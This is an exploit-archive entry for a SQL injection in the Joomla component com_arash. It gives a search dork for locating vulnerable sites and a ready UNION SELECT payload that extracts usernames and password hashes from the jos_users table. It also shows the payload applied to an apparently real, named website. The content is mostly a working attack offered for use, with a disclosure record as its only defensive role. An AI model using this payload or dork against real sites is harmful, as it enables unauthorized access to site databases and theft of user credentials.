Joomla Component com_arash SQL Injection Vulnerability

2010-09-06T00:00:00
ID 1337DAY-ID-13993
Type zdt
Reporter NEO
Modified 2010-09-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================
Joomla Component com_arash SQL Injection Vulnerability
======================================================

==========================================================================
[+] ExpLoit Title : Joomla Component com_arash SQL Injection Vulnerability
[+] Date          : 2010-09-05
[+] Author        : DataIran Security // NEO
[+] home          : http://datairan.net
[+] Dork          : inurl:com_arash
==========================================================================

details:

vuln url :
http://target/index.php?option=com_arash&id=x [sqli]

u can use this injection query :

POC : and 1=0 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users
?

example :
http://www.kooch.ir/index.php?option=com_arash&id=3 and 1=0 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users

spt : DataIran Crew & All iranians



#  0day.today [2018-02-27]  #